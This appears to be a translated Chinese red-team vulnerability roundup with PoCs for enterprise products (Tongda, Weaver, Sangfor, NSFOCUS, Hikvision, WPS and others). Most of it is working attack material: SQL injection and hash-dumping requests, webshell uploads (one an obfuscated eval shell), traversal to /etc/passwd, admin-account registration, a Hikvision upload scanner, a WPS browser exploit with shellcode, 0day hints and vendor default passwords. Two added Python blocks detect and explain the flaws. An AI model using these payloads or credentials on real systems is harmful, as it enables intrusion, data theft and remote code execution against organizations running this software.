If you want to play CTF after HW, take a look at polarctf.com.
WPS users are advised to update to the latest version from the official site promptly; the PoC has been added.
Any new vulnerability news will be synced to this document in real time.
A summary of each vendor's default passwords and the recommended IPs to block are at the end.
证语实验室 (Zhengyu Lab) has two parts: 证语问安 (Zhengyu Wen'an) does security penetration testing, and 证语听证 (Zhengyu Tingzheng) does digital forensics.
Tongda OA
SQL injection vulnerability CVE-2023-4165 POC
GET /general/system/seal_manage/iweboffice/delete_seal.php?DELETE_STR=1)%20and%20(substr(DATABASE(),1,1))=char(84)%20and%20(select%20count(*)%20from%20information_schema.columns%20A,information_schema.columns%20B)%20and(1)=(1 HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

GET /general/system/seal_manage/dianju/delete_log.php?DELETE_STR=1)%20and%20(substr(DATABASE(),1,1))=char(84)%20and%20(select%20count(*)%20f
Weaver OA
Weaver OA code execution EXP
Description and affected scope
Weaver E-Office 9 contains a code-issue vulnerability: the file /inc/jquery/uploadify/uploadify.php handles the Filedata parameter in a way that allows unrestricted file upload.
Weaver E-Office 9.0
POST /inc/jquery/uploadify/uploadify.php HTTP/1.1
Host: 192.168.232.137:8082
User-Agent: test
Connection: close
Content-Length: 493
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85
--25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85
Content-Disposition: form-data; name="Filedata"; filename="666.php"
Content-Type: application/octet-stream
<?php phpinfo();?>
--25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85--
--25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85
Content-Disposition: form-data; name="file"; filename=""
Content-Type: application/octet-stream
--25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85--
Weaver E-Office 9 unauthenticated file inclusion
http://URL/E-mobile/App/Init.php?weiApi=1&sessionkey=ee651bec023d0db0c233fcb562ec7673_admin&m=12344554_../../attachment/xxx.xls
Legendsec (网神) series
Legendsec SecGate 3600 firewall obj_app_upfile arbitrary file upload
POST /?g=obj_app_upfile HTTP/1.1
Host: x.x.x.x
Accept: */*
Accept-Encoding: gzip, deflate
Content-Length: 574
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJpMyThWnAxbcBBQc
User-Agent: Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.0)
------WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition: form-data; name="MAX_FILE_SIZE"
10000000
------WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition: form-data; name="upfile"; filename="vulntest.php"
Content-Type: text/plain
<?php /* PHP webshell goes here */ ?>
------WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition: form-data; name="submit_post"
obj_app_upfile
------WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition: form-data; name="hash"
0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundaryJpMyThWnAxbcBBQc--
Webshell path: attachements/xxx.php
Legendsec SecSSL 3600 secure access gateway arbitrary password change
POST /changepass.php?type=2
Cookie: admin_id=1; gw_user_ticket=ffffffffffffffffffffffffffffffff; last_step_param={"this_name":"test","subAuthId":"1"}
old_pass=&password=Test123!@&repassword=Test123!@
Sangfor series
Sangfor Application Delivery command execution
POST /rep/login
Host: URL
clsMode=cls_mode_login%0Als%0A&index=index&log_type=report&loginType=account&page=login&rnd=0&userID=admin&userPsw=123
Sangfor reporting system arbitrary file read
GET /report/download.php?pdf=../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:85
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: */*
Connection: Keep-Alive
NSFOCUS series
NSFOCUS SAS security audit system arbitrary file read
/webconf/GetFile/indexpath=../../../../../../../../../../../../../../etc/passwd
NSFOCUS SAS bastion host Exec remote command execution
/webconf/Exec/index?cmd=<command to execute>
Glodon products
Glodon back-end file upload
POST /gtp/im/services/group/msgbroadcastuploadfile.aspx HTTP/1.1
Host: 10.10.10.1:8888
X-Requested-With: Ext.basex
Accept: text/html, application/xhtml+xml, image/jxr, */*
Accept-Language: zh-Hans-CN,zh-Hans;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFfJZ4PlAZBixjELj
Accept: */*
Origin: http://10.10.10.1
Referer: http://10.10.10.1:8888/Workflow/Workflow.aspx?configID=774d99d7-02bf-42ec-9e27-caeaa699f512&menuitemid=120743&frame=1&modulecode=GTP.Workflow.TaskCenterModule&tabID=40
Cookie:
Connection: close
Content-Length: 421
------WebKitFormBoundaryFfJZ4PlAZBixjELj
Content-Disposition: form-data; filename="1.aspx";filename="1.jpg"
Content-Type: application/text
<%@ Page Language="Jscript" Debug=true%>
<%
var FRWT='XeKBdPAOslypgVhLxcIUNFmStvYbnJGuwEarqkifjTHZQzCoRMWD';
var GFMA=Request.Form("qmq1");
var ONOQ=FRWT(19) + FRWT(20) + FRWT(8) + FRWT(6) + FRWT(21) + FRWT(1);
eval(GFMA, ONOQ);
%>
------WebKitFormBoundaryFfJZ4PlAZBixjELj--
Glodon OA SQL injection
POST /Webservice/IM/Config/ConfigService.asmx/GetIMDictionary HTTP/1.1
Host: xxx.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://xxx.com:8888/Services/Identification/Server/Incompatible.aspx
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie:
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 88
dasdas=&key=1' UNION ALL SELECT top 1812 concat(F_CODE,':',F_PWD_MD5) from T_ORG_USER --
Tongda
CVE-2023-4166
Affected scope: Tongda OA versions before 11.10
Request packet
GET /general/system/seal_manage/dianju/delete_log.php?DELETE_STR=1)%20and%20(substr(DATABASE(),1,1))=char(84)%20and%20(select%20count(*)%20from%20information_schema.columns%20A,information_schema.columns%20B)%20and(1)=(1 HTTP/1.1
Host: 192.168.232.137:8098
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=1u7tsd1cpgp9qvco726smb50h5; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=779f3f46
Upgrade-Insecure-Requests: 1
Kingsoft Office
WPS command execution
WPS affected scope: WPS Office 2023 Personal Edition < 11.1.0.15120
WPS Office 2019 Enterprise Edition < 11.8.2.12085
Start an HTTP server listening on port 80 in the directory containing 1.html, and modify the hosts file (the test hard-codes this):
127.0.0.1 clientweb.docer.wps.cn.cloudwps.cn
Triggering the vulnerability requires the domain to satisfy the rule clientweb.docer.wps.cn.{xxxxx}wps.cn; cloudwps.cn has no relation whatsoever to wps.cn.
The code block is below. (Contact the blog author if you need the original PDF.)
<script>
if(typeof alert === "undefined"){
alert = console.log;
}
let f64 = new Float64Array(1);
let u32 = new Uint32Array(f64.buffer);
function d2u(v) {
f64[0] = v;
return u32;
}
function u2d(lo, hi) {
u32[0] = lo;
u32[1] = hi;
return f64[0];
}
function gc(){ // major
for (let i = 0; i < 0x10; i++) {
new Array(0x100000);
}
}
function foo(bug) {
function C(z) {
Error.prepareStackTrace = function(t, B) {
return B[z].getThis();
};
let p = Error().stack;
Error.prepareStackTrace = null;
return p;
}
function J() {}
var optim = false;
var opt = new Function(
'a', 'b', 'c',
'if(typeof a===\'number\'){if(a>2){for(var
i=0;i<100;i++);return;}b.d(a,b,1);return}' +
'g++;'.repeat(70));
var e = null;
J.prototype.d = new Function(
'a', 'b', '"use strict";b.a.call(arguments,b);return arguments[a];');
J.prototype.a = new Function('a', 'a.b(0,a)');
J.prototype.b = new Function(
'a', 'b',
'b.c();if(a){' +
'g++;'.repeat(70) + '}');
J.prototype.c = function() {
if (optim) {
var z = C(3);
var p = C(3);
z[0] = 0;
e = {M: z, C: p};
}
};
var a = new J();
// jit optim
if (bug) {
for (var V = 0; 1E4 > V; V++) {
opt(0 == V % 4 ? 1 : 4, a, 1);
}
}
optim = true;
opt(1, a, 1);
return e;
}
e1 = foo(false);
e2 = foo(true);
delete e2.M[0];
let hole = e2.C[0];
let map = new Map();
map.set('asd', 8);
map.set(hole, 0x8);
map.delete(hole);
map.delete(hole);
map.delete("asd");
map.set(0x20, "aaaa");
let arr3 = new Array(0);
let arr4 = new Array(0);
let arr5 = new Array(1);
let oob_array = [];
oob_array.push(1.1);
map.set("1", -1);
let obj_array = {
m: 1337, target: gc
};
let ab = new ArrayBuffer(1337);
let object_idx = undefined;
let object_idx_flag = undefined;
let max_size = 0x1000;
for (let i = 0; i < max_size; i++) {
if (d2u(oob_array[i])[0] === 0xa72) {
object_idx = i;
object_idx_flag = 1;
break;
}if (d2u(oob_array[i])[1] === 0xa72) {
object_idx = i + 1;
object_idx_flag = 0;
break;
}
}
function addrof(obj_para) {
obj_array.target = obj_para;
let addr = d2u(oob_array[object_idx])[object_idx_flag] - 1;
obj_array.target = gc;
return addr;
}
function fakeobj(addr) {
let r8 = d2u(oob_array[object_idx]);
if (object_idx_flag === 0) {
oob_array[object_idx] = u2d(addr, r8[1]);
}else {
oob_array[object_idx] = u2d(r8[0], addr);
}
return obj_array.target;
}
let bk_idx = undefined;
let bk_idx_flag = undefined;
for (let i = 0; i < max_size; i++) {
if (d2u(oob_array[i])[0] === 1337) {
bk_idx = i;
bk_idx_flag = 1;
break;
}if (d2u(oob_array[i])[1] === 1337) {
bk_idx = i + 1;
bk_idx_flag = 0;
break;
}
}
let dv = new DataView(ab);
function get_32(addr) {
let r8 = d2u(oob_array[bk_idx]);
if (bk_idx_flag === 0) {
oob_array[bk_idx] = u2d(addr, r8[1]);
} else {
oob_array[bk_idx] = u2d(r8[0], addr);
}
let val = dv.getUint32(0, true);
oob_array[bk_idx] = u2d(r8[0], r8[1]);
return val;
}
function set_32(addr, val) {
let r8 = d2u(oob_array[bk_idx]);
if (bk_idx_flag === 0) {
oob_array[bk_idx] = u2d(addr, r8[1]);
} else {
oob_array[bk_idx] = u2d(r8[0], addr);
}
dv.setUint32(0, val, true);
oob_array[bk_idx] = u2d(r8[0], r8[1]);
}
function write8(addr, val) {
let r8 = d2u(oob_array[bk_idx]);
if (bk_idx_flag === 0) {
oob_array[bk_idx] = u2d(addr, r8[1]);
} else {
oob_array[bk_idx] = u2d(r8[0], addr);
}
dv.setUint8(0, val);
}
let fake_length = get_32(addrof(oob_array)+12);
set_32(get_32(addrof(oob_array)+8)+4,fake_length);
let wasm_code = new
Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,
128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,
128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0
,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11]);
let wasm_mod = new WebAssembly.Module(wasm_code);
let wasm_instance = new WebAssembly.Instance(wasm_mod);
let f = wasm_instance.exports.main;
let target_addr = addrof(wasm_instance)+0x40;
let rwx_mem = get_32(target_addr);
//alert("rwx_mem is"+rwx_mem.toString(16));
const shellcode = new Uint8Array([0xfc, 0xe8, 0x82, 0x00, 0x00, 0x00, 0x60, 0x89,
0xe5, 0x31, 0xc0, 0x64, 0x8b, 0x50, 0x30,0x8b, 0x52, 0x0c, 0x8b, 0x52, 0x14,
0x8b, 0x72, 0x28, 0x0f, 0xb7, 0x4a, 0x26, 0x31, 0xff,0xac, 0x3c, 0x61, 0x7c,
0x02, 0x2c, 0x20, 0xc1, 0xcf, 0x0d, 0x01, 0xc7, 0xe2, 0xf2, 0x52,0x57, 0x8b,
0x52, 0x10, 0x8b, 0x4a, 0x3c, 0x8b, 0x4c, 0x11, 0x78, 0xe3, 0x48, 0x01,
0xd1,0x51, 0x8b, 0x59, 0x20, 0x01, 0xd3, 0x8b, 0x49, 0x18, 0xe3, 0x3a, 0x49,
0x8b, 0x34, 0x8b,0x01, 0xd6, 0x31, 0xff, 0xac, 0xc1, 0xcf, 0x0d, 0x01, 0xc7,
0x38, 0xe0, 0x75, 0xf6, 0x03,0x7d, 0xf8, 0x3b, 0x7d, 0x24, 0x75, 0xe4, 0x58,
0x8b, 0x58, 0x24, 0x01, 0xd3, 0x66, 0x8b,0x0c, 0x4b, 0x8b, 0x58, 0x1c, 0x01,
0xd3, 0x8b, 0x04, 0x8b, 0x01, 0xd0, 0x89, 0x44, 0x24,0x24, 0x5b, 0x5b, 0x61,
0x59, 0x5a, 0x51, 0xff, 0xe0, 0x5f, 0x5f, 0x5a, 0x8b, 0x12, 0xeb,0x8d, 0x5d,
0x6a, 0x01, 0x8d, 0x85, 0xb2, 0x00, 0x00, 0x00, 0x50, 0x68, 0x31, 0x8b,
0x6f,0x87, 0xff, 0xd5, 0xbb, 0xe0, 0x1d, 0x2a, 0x0a, 0x68, 0xa6, 0x95, 0xbd,
0x9d, 0xff, 0xd5,0x3c, 0x06, 0x7c, 0x0a, 0x80, 0xfb, 0xe0, 0x75, 0x05, 0xbb,
0x47, 0x13, 0x72, 0x6f, 0x6a,0x00, 0x53, 0xff, 0xd5, 0x63, 0x61, 0x6c, 0x63,
0x00]);
for(let i=0;i<shellcode.length;i++){
write8(rwx_mem+i,shellcode[i]);
}
f();
</script>
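The trigger condition described above (a hostname of the form clientweb.docer.wps.cn.{xxxxx}wps.cn passes even though cloudwps.cn is unrelated to wps.cn) is a textbook prefix/suffix string check with no label boundary. The example below is added here and is not the page's or WPS's code: weak_allow is an assumed model of the rule as the page describes it, shown beside an exact-match allowlist and a label-boundary subdomain check, with constructed candidate hostnames.

```python
# Hosts the client is actually allowed to load active content from (allowlist).
ALLOWLIST = {"clientweb.docer.wps.cn"}
TRUSTED_PREFIX = "clientweb.docer.wps.cn"
TRUSTED_SUFFIX = "wps.cn"


def normalize(host):
    """Lower-case and drop a trailing dot so casing or FQDN form cannot fool a comparison."""
    return host.strip().lower().rstrip(".")


def weak_allow(host):
    """Assumed model of the flawed rule described on the page: the trusted name must start
    the hostname and the hostname must end in 'wps.cn'. No label boundary is enforced, so
    'clientweb.docer.wps.cn.cloudwps.cn' passes although cloudwps.cn is unrelated to wps.cn."""
    h = normalize(host)
    return h.startswith(TRUSTED_PREFIX) and h.endswith(TRUSTED_SUFFIX)


def strict_allow(host):
    """Exact match against the allowlist; no substring or suffix logic at all."""
    return normalize(host) in ALLOWLIST


def subdomain_of(host, parent):
    """Label-boundary check for 'host is parent or lies under parent', which is how a
    suffix rule should be written when one is genuinely needed."""
    h, p = normalize(host), normalize(parent)
    return h == p or h.endswith("." + p)


def compare(hosts):
    """Map each candidate hostname to (weak verdict, strict verdict)."""
    return {h: (weak_allow(h), strict_allow(h)) for h in hosts}


# Constructed candidates: the legitimate host, the page's bypass form, and controls.
CANDIDATES = [
    "clientweb.docer.wps.cn",
    "CLIENTWEB.docer.wps.cn.",
    "clientweb.docer.wps.cn.cloudwps.cn",
    "clientweb.docer.wps.cn.unrelated.example",
    "docer.wps.cn",
]

if __name__ == "__main__":
    for host, (weak, strict) in compare(CANDIDATES).items():
        under = subdomain_of(host, TRUSTED_SUFFIX)
        print(f"{host:45} weak={weak!s:5} strict={strict!s:5} under wps.cn={under}")
```

Only the bypass hostname separates the two verdicts: the weak rule accepts it, the exact allowlist and the label-boundary check both reject it.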
Hikvision
HIKVISION iSecure Center integrated security management platform file upload
Below
#!/usr/bin/env python
# *-* coding:utf-8 *-*
import sys
import requests
import string
import random
import urllib3
urllib3.disable_warnings()
proxies = {
    'http': 'http://127.0.0.1:8080',
    'https': 'http://127.0.0.1:8080',  # 127.0.0.1:8080 proxy, so Burp Suite can capture the traffic
}
def run(arg):
    try:
        flag = ''.join(random.choices(string.ascii_uppercase + string.digits, k=9))
        filename = ''.join(random.choices(string.ascii_uppercase + string.digits, k=10))
        vuln_url = arg + "center/api/files;.js"
        headers = {'User-Agent': 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)',
                   'Accept': '*/*',
                   'Content-Type': 'application/x-www-form-urlencoded'}
        file = {'file': (f'../../../../../bin/tomcat/apache-tomcat/webapps/clusterMgr/(unknown).txt', flag, 'application/octet-stream')}
        r = requests.post(vuln_url, files=file, timeout=15, verify=False, proxies=proxies)
        if r.status_code == 200 and "webapps/clusterMgr" in r.text:
            payload = f"clusterMgr/(unknown).txt;.js"
            url = arg + payload
            r2 = requests.get(url, timeout=15, verify=False, proxies=proxies)
            if r2.status_code == 200 and flag in r2.text:
                print('\033[1;31;40m')
                print(arg + f":存在海康威视isecure center 综合安防管理平台存在任意文件上传漏洞\nshell地址:{url}")
                print('\033[0m')
            else:
                print(arg + ":不存在漏洞")
    except:
        print(arg + ":不存在漏洞")
if __name__ == '__main__':
    url = sys.argv[1]
    run(url)
POST request packet
POST /center/api/files;.js HTTP/1.1
Host: x.x.x.x
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 258
Content-Type: multipart/form-data; boundary=e54e7e5834c8c50e92189959fe7227a4
--e54e7e5834c8c50e92189959fe7227a4
Content-Disposition: form-data; name="file"; filename="../../../../../bin/tomcat/apache-tomcat/webapps/clusterMgr/2BT5AV96QW.txt"
Content-Type: application/octet-stream
9YPQ3I3ZS
Landray OA
Unauthenticated code execution
POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
Host: www.ynjd.cn:801
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: */*
Connection: Keep-Alive
Content-Length: 42
Content-Type: application/x-www-form-urlencoded
var={"body":{"file":"file:///etc/passwd"}}
This one can be deleted, it is ancient. This is an old vulnerability.
DAS-Security (安恒)
DAS-Security Mingyu operations audit and risk control system (bastion host) arbitrary user registration
POST /service/?unix:/../../../../var/run/rpc/xmlrpc.sock|http://test/wsrpc HTTP/1.1
Host: xxx
Cookie: LANG=zh; USM=0a0e1f29d69f4b9185430328b44ad990832935dbf1b90b8769d297dd9f0eb848
Cache-Control: max-age=0
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="100", "Google Chrome";v="100"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 1121
<?xml version="1.0"?>
<methodCall>
<methodName>web.user_add</methodName>
<params>
<param>
<value>
<array>
<data>
<value>
<string>admin</string>
</value>
<value>
<string>5</string>
</value>
<value>
<string>XX.XX.XX.XX</string>
</value>
</data>
</array>
</value>
</param>
<param>
<value>
<struct>
<member>
<name>uname</name>
<value>
<string>deptadmin</string>
</value>
</member>
<member>
<name>name</name>
<value>
<string>deptadmin</string>
</value>
</member>
<member>
<name>pwd</name>
<value>
<string>Deptadmin@123</string>
</value>
</member>
<member>
<name>authmode</name>
<value>
<string>1</string>
</value>
</member>
<member>
<name>deptid</name>
<value>
<string></string>
</value>
</member>
<member>
<name>email</name>
<value>
<string></string>
</value>
</member>
<member>
<name>mobile</name>
<value>
<string></string>
</value>
</member>
<member>
<name>comment</name>
<value>
<string></string>
</value>
</member>
<member>
<name>roleid</name>
<value>
<string>101</string>
</value>
</member>
</struct></value>
</param>
</params>
</methodCall>
Hand (汉得) SRM tomcat.jsp login bypass POC
/tomcat.jsp?dataName=role_id&dataValue=1
/tomcat.jsp?dataName=user_id&dataValue=1
After visiting each of these in turn, the back end can be accessed directly.
Then visit the back end: /main.screen
Chenxin Jingyun (辰信景云) endpoint security management system login SQL injection POC
POST /api/user/login
captcha=&password=21232f297a57a5a743894a0e4a801fc3&username=admin'and(select*from(select+sleep(3))a)='
Yonyou mobile management system uploadApk.do arbitrary file upload
POST /maportal/appmanager/uploadApk.do?pk_obj= HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryvLTG6zlX0gZ8LzO3
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Cookie: JSESSIONID=4ABE9DB29CA45044BE1BECDA0A25A091.server
Connection: close
------WebKitFormBoundaryvLTG6zlX0gZ8LzO3
Content-Disposition: form-data; name="downloadpath"; filename="a.jsp"
Content-Type: application/msword
hello
------WebKitFormBoundaryvLTG6zlX0gZ8LzO3--
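The requests above share a handful of distinctive endpoints and query patterns. The following added example (not from the page; written here for defenders) runs rule-based detection over constructed sample access-log lines using those endpoints, URL-decoding each request target repeatedly so a double-encoded payload does not slip past the rules. The rule names, sample IPs and log lines are constructed.

```python
import re
from urllib.parse import unquote

# One access-log line in Apache/Nginx "combined" format; only the request line and status matter.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# Rules: (name, HTTP methods, regex over the URL-decoded request target).
# Paths are the endpoints from the PoCs above; the query conditions are the
# parts of those PoCs that a legitimate request would not carry.
SIGNATURES = [
    ("tongda-oa-cve-2023-4165-4166-sqli", {"GET"},
     r"^/general/system/seal_manage/(dianju/delete_log|iweboffice/delete_seal)\.php\?"
     r".*DELETE_STR=.*\)\s*and\s*\("),
    ("hikvision-isecure-files-upload", {"POST"}, r"^/center/api/files;"),
    ("sangfor-report-download-traversal", {"GET"}, r"^/report/download\.php\?.*pdf=[^&]*\.\./"),
    ("nsfocus-sas-exec-rce", {"GET", "POST"}, r"^/webconf/Exec/index\?([^&]*&)*cmd="),
    ("nsfocus-sas-getfile-read", {"GET", "POST"}, r"^/webconf/GetFile/.*\.\./"),
    ("weaver-eoffice9-uploadify-upload", {"POST"}, r"^/inc/jquery/uploadify/uploadify\.php"),
    ("secgate3600-obj_app_upfile-upload", {"POST"}, r"^/\?([^&]*&)*g=obj_app_upfile"),
    ("landray-varkind-custom-jsp", {"POST"}, r"^/sys/ui/extend/varkind/custom\.jsp"),
    ("glodon-msgbroadcastuploadfile", {"POST"}, r"^/gtp/im/services/group/msgbroadcastuploadfile\.aspx"),
    ("yonyou-uploadapk-upload", {"POST"}, r"^/maportal/appmanager/uploadApk\.do"),
    ("hand-srm-tomcat-jsp-bypass", {"GET"}, r"^/tomcat\.jsp\?.*dataName=(role_id|user_id)"),
]
COMPILED = [(name, methods, re.compile(rx, re.IGNORECASE)) for name, methods, rx in SIGNATURES]


def decode_target(target, rounds=3):
    """URL-decode repeatedly (bounded) so a double-encoded payload such as %2529 for ')'
    is compared in the same form as a single-encoded one."""
    for _ in range(rounds):
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
    return target


def detect(line):
    """Return a hit dict for the first matching rule, or None for an unparseable or benign line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = decode_target(m["target"])
    for name, methods, rx in COMPILED:
        if m["method"] in methods and rx.search(target):
            return {"ip": m["ip"], "rule": name, "status": int(m["status"]), "target": target}
    return None


def scan(log_text):
    """Run every rule over each line; the status code is kept so a 200 on an upload or
    injection endpoint can be triaged ahead of a 404 from a scanner."""
    return [hit for hit in map(detect, log_text.splitlines()) if hit]


# Constructed sample log (not real traffic): five PoC-shaped requests, two benign ones,
# and one double-encoded copy of the Tongda OA injection.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Aug/2023:10:01:02 +0800] "GET /general/system/seal_manage/dianju/delete_log.php?DELETE_STR=1)%20and%20(substr(DATABASE(),1,1))=char(84) HTTP/1.1" 200 512
10.0.0.6 - - [12/Aug/2023:10:01:05 +0800] "POST /center/api/files;.js HTTP/1.1" 200 233
10.0.0.7 - - [12/Aug/2023:10:01:09 +0800] "GET /report/download.php?pdf=../../../../../etc/passwd HTTP/1.1" 200 1821
10.0.0.8 - - [12/Aug/2023:10:01:11 +0800] "GET /webconf/Exec/index?cmd=hostname HTTP/1.1" 200 40
10.0.0.9 - - [12/Aug/2023:10:01:15 +0800] "POST /inc/jquery/uploadify/uploadify.php HTTP/1.1" 200 60
10.0.0.10 - - [12/Aug/2023:10:02:00 +0800] "GET /general/index.php HTTP/1.1" 200 4096
10.0.0.11 - - [12/Aug/2023:10:02:03 +0800] "GET /report/download.php?pdf=monthly.pdf HTTP/1.1" 200 90210
10.0.0.12 - - [12/Aug/2023:10:02:09 +0800] "GET /general/system/seal_manage/iweboffice/delete_seal.php?DELETE_STR=1%2529%2520and%2520%2528substr(DATABASE(),1,1))=char(84) HTTP/1.1" 200 512
"""

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f"{hit['ip']:12} {hit['status']} {hit['rule']:38} {hit['target']}")
```

The two benign lines produce no hit, and the double-encoded request is matched by the same rule as its plain form because the target is decoded before the rules run.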
nday sync
1. Hikvision integrated security management platform unauthenticated file upload
The vendor's fix for this one is flawed: you can still reach the root directory through ../ traversal, just via a different endpoint.
2. Landray OA unauthenticated code execution
Landray V13/14/15 need no introduction; last year the code execution and Jinge (金格) interface bugs were hit hard, and after this year's major Landray update many RCE issues remain.
3. Seeyon M3 Server xxxx deserialization
Those who know, know.
4. Seeyon A8 V8 SP1/SP2 file upload (1day)
1day; many were fixed at the start of this year, but the ajaxdo endpoint's ajaxAction still exposes plenty of file-operation methods.
5. Primeton EOS
Unauthenticated code execution. This system has too many code execution bugs to list; a rewrite is advisable.
6. Weaver E-cology post-auth file upload (0day)
Reads xxx from the database and writes it to the root directory. Apart from some circulating 1days, Weaver can be considered basically secure; the RASP can be bypassed, but I don't want to spend more effort looking. This one bypasses last year's unauthenticated bug.
7. Weaver E-Mobile arbitrary user login (1day)
E-Mobile is hard to exploit further, but keep an eye on it if there is an information-leak risk.
8. Weaver E-Office 10 information leak + post-auth file upload (0day)
A very strong chain; E-Office 9 has too many holes and too little deployment to be worth writing up.
9. Qiyuesuo (契约锁) e-signature system RCE (1day)
Fixed during an operation in Shanghai; the patch came quickly, this signature vendor responds fast; often sold bundled with Weaver ECO.
10. Esafenet (亿赛通) electronic document platform file upload
The upload 1days on the market were all patched last year; there are new ones this year, worth watching.
11. iDocView command execution
Found on a project last year, still present this year.
12. JeeSite code execution (0day)
Genuine, no doubt about it.
13. LiveBOS file upload
Financial-sector supply chain; the directory traversal of earlier years is no longer needed, and the upload bypass in the new version's Lingdong framework is rather meh.
14. Yonyou NC Cloud arbitrary file write (0day)
Most NC Cloud instances seen this year were unpatched.
15. "Big brother" VPN (一哥VPN)
Binary vulnerabilities are expected to be hit hard this year too; port PWN!
16. xx IOA PWN
Zero trust is not necessarily secure.
17. xxx NAC PWN
Remember to fix weak passwords too.
18. Sangfor Application Delivery system command execution
19. DzzOffice collaborative office documents unauthorized access
20. E-signature platform code execution
21. Weaver OA back-end access vulnerability
22. UCloud unauthorized retrieval of arbitrary user cookies
23. Feishu client RCE
24. Weaver E-Office V10 unauthenticated RCE
25. Laiketui (来客推) mall arbitrary file upload
26. Tianming (天明) bastion host 0day
27. Mingyu operations audit and risk control system bastion host arbitrary user registration
28. Collaborative management system SQL injection
29. Weaver E-Mobile injection
30. TRS WCM arbitrary command execution
31. Yonyou Finance Cloud arbitrary file upload
Default password summary by vendor
Topsec firewall: username superman, password talent
Topsec firewall: username superman, password talent!23
Lenovo Leadsec firewall: username admin, password leadsec@7766, administrator, bane@7766
Sangfor firewall: username admin, password admin
Venustech: username admin, password bane@7766; username admin, password admin@123
Juniper: username netscreen, password netscreen
Cisco: username admin, password cisco
Huawei: username admin, password Admin@123
H3C: username admin, password admin
NSFOCUS IPS: username weboper, password weboper
Legendsec firewall GE1: username admin, password firewall
Sangfor VPN: port 51111, password delanrecover
Huawei VPN: account root, password mduadmin
Huawei firewall: admin, password Admin@123
Eudemon/Juniper firewall: netscreen / netscreen
DPtech: 192.168.0.1, default username and password admin / admin_default
Hillstone: 192.168.1.1, default admin account hillstone, password hillstone
